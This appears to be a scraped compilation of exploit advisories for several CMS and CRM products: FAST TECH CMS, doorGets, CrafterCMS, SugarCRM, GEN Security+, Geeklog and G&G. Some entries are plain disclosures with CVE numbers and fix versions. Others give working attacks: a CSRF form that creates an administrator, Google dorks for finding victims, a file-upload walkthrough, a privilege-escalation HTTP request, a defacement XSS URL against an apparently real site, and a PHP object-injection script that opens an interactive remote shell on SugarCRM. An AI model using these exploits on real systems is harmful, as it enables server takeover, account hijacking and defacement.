<pre><code>====================================================================================================================================<br />| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) | <br />| # Vendor : http://www.fasttechtechnologies.in/ | <br />| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 5.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /admin/add_new_user.php<br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head profile="http://www.w3.org/2005/10/profile"><br /><script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /><form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data"><br /> <div class="form-group"><br /> <label>Name</label><br /> <input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required><br /> </div><br /> <div class="form-group"><br /> <label>User Name</label><br /> <input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required><br /> </div><br /> <br /> <div class="form-group"><br /> <label>Password</label><br /> <input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required><br /> </div><br /> <br /> <br /> <div class="form-group"><br /> <label>Confirm Password</label><br /> <input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required><br /> </div><br /> <br /> <br /> <div class="form-group"><br /> <label>User Type</label><br /> <select class="form-control" id="usertype" name="usertype" required><br /> <option>Select Type</option><br /> <option value="A">Administrator</option><br /> <option value="R">Retail</option><br /> <br /> </select><br /> </div><br /> <br /> <div class="form-group"><br /> <label>Email-Id</label><br /> <input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required><br /> </div><br /> <br /> <div class="box-footer"><br /> <button type="submit" class="btn btn-primary" name="submit">Submit</button><br /> </div><br /> </form><br /> </div><br /> <br /> </div><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : doorGets CMS v12 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://doorgets.io/t/en/ | <br />| # Dork : "Powered with doorGets ™" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Register new user . http://127.0.0.1/bestwayschoolcom/dg-user/en/?controller=authentification&action=register<br /><br />[+] Confirmation link in the email.<br /><br />[+] After login go to manage your profile http://127.0.0.1/elimu7com/eXplored/dg-user/en/?controller=account <br /><br />[+] From paramaters Choose an HTML editor ( editor tinymce ) & press Save .<br /><br />[+] Creat new Blog http://target_site/eXplored/dg-user/en/?controller=moduleblog&uri=blog&action=add<br /><br />[+] insert your Ev!l .php2 .html .svg ...<br /><br />[+] http://target_site/fileman/Uploads/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>---------------------------------------------------------------------------<br />CrafterCMS <= 4.0.2 Multiple Reflected Cross-Site Scripting <br />Vulnerabilities<br />---------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://craftercms.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.0.2 and prior versions.<br />Version 3.1.27 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />There are multiple Reflected Cross-Site Scripting vulnerabilities <br />affecting CrafterCMS.<br />The vulnerabilities exist in every API endpoint that reflect some input <br />parameter and<br />do produce XML responses. Following are some examples:<br /><br />• /api/1/site/url/transform - url and transformerName parameters are <br />affected<br />• /api/1/site/content_store/children - url parameter is affected<br />• /api/1/site/content_store/item - url parameter is affected<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.0.3, 3.1.28, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[22/11/2022] - Vendor notified<br />[24/03/2023] - Fixed versions released<br />[03/08/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-4136 to these vulnerabilities.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano, working with IMQ Minded <br />Security.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-09<br /><br /><br />[-] Other References:<br /><br />https://docs.craftercms.org/en/4.1/security/advisory.html#cv-2023080301<br /><br /></code></pre>
<pre><code>----------------------------------------------------<br />SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities<br />----------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />1) User input passed through the “metrics” parameter to the <br />“/Forecasts/metrics”<br />REST API endpoint is not properly sanitized before being used to <br />construct a SQL<br />query. This can be exploited by malicious users to e.g. read sensitive <br />data from<br />the database through in-band SQL Injection attacks.<br /><br />2) User input passed through the “placeholder_fields” parameter to the <br />e.g.<br />“/Notes/{recordID}/link/history” REST API endpoint is not properly <br />sanitized before<br />being used to construct a SQL query. This can be exploited by malicious <br />users to<br />e.g. read sensitive data from the database through in-band SQL Injection <br />attacks.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35811_1.php<br />https://karmainsecurity.com/pocs/CVE-2023-35811_2.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35811 to these vulnerabilities.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-08<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/<br /><br /></code></pre>
<pre><code>-------------------------------------------------------------------------------<br />SugarCRM <= 12.2.0 (Docusign_GlobalSettings) PHP Object Injection <br />Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />There is a Second-Order PHP Object Injection vulnerability which might <br />allow malicious<br />admin users to execute arbitrary PHP code on the web server (RCE) by <br />storing malicious<br />serialized objects into the database.<br /><br />The vulnerability can be triggered by invoking the <br />"/DocuSign/getGlobalConfig" REST API<br />endpoint, which is using the unserialize() PHP function with the <br />"Docusign_GlobalSettings"<br />parameter. This can be exploited to inject arbitrary PHP objects into <br />the application<br />scope, allowing an attacker to perform a variety of attacks.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35810.php<br /><br />[Packet Storm Note: see below]<br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35810 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-07<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-009/<br /><br /><br /><br />---- poc ----<br /><br /><?php<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");<br /><br />include("chain.php");<br /><br />function inject_pop_chain($cmd)<br />{<br /> global $ch, $url;<br /><br /> $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]);<br /> $pop = new \Monolog\Handler\SyslogUdpHandler($pop);<br /> $pop = base64_encode(serialize($pop));<br /><br /> curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}');<br /><br /> curl_exec($ch);<br />}<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />$ch = curl_init();<br /><br />$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br />if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");<br /><br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);<br /><br />print "[+] Launching shell\n";<br /><br />while(1)<br />{<br /> print "\nsugar-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> inject_pop_chain($cmd);<br /> curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig");<br /> curl_setopt($ch, CURLOPT_POST, false);<br /> preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br />// cleaning<br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}');<br /><br />curl_exec($ch);<br /><br /></code></pre>
<pre><code>------------------------------------------------------------------------<br />SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability<br />------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is exploitable through the "/maps/updateGeocodeStatus" <br />REST API<br />endpoint. This might allow a malicious user to modify arbitrary Sugar <br />Beans, and that<br />could lead to a variety of security impacts, such as Privilege <br />Escalation attacks by<br />sending an HTTP request like the following:<br /><br />POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1<br />Host: sugarcrm_website<br />Content-Type: application/json<br />OAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974<br />Content-Length: 96<br />Connection: close<br /><br />{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35809 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-06<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------<br />SugarCRM <= 12.2.0 (Notes) Unrestricted File Upload Vulnerability<br />-----------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 12.2.0 and prior versions.<br />Version 12.0.2 and prior versions.<br />Version 11.0.5 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />When handling the "save" action within the "Notes" module the <br />application allows uploading<br />of any kind of file into the /upload/ directory. This one is protected <br />by the main SugarCRM<br />.htaccess file, i.e. it doesn't allow access/execution for PHP files. <br />However, this behaviour<br />can be overridden if a subdirectory contains another .htaccess file. So, <br />an attacker can<br />leverage the vulnerability to firstly upload a new .htaccess file and <br />then to upload the<br />PHP code they want to execute.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-35808.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[14/02/2023] - Vendor notified<br />[12/04/2023] - Fixed versions released<br />[17/06/2023] - CVE number assigned<br />[23/08/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-35808 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-05<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-006/<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : GEN Security+ v4.0 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.ptcpay.com/ |<br />| # Dork : Powered by GeN4 Security+ 2.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject her)<br /><br />[+] login : http://127.0.0.1/GEN/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Geeklog v2.1.0b1 database disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.geeklog.net/ |<br />| # Dork : Powered by Geeklog |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Suffers from a database disclosure vulnerability Allow visitors to know the site manager information .<br /><br />[+] Use Payload : /admin/install/configinfo.php<br /><br />[+] http://127.0.0.1/public_html/admin/install/configinfo.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : G&G Corporate CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://gegweb.it | <br />| # Dork : intext:Powered by Studio G&G Corporate Communication site:it |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee><br /><br />[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
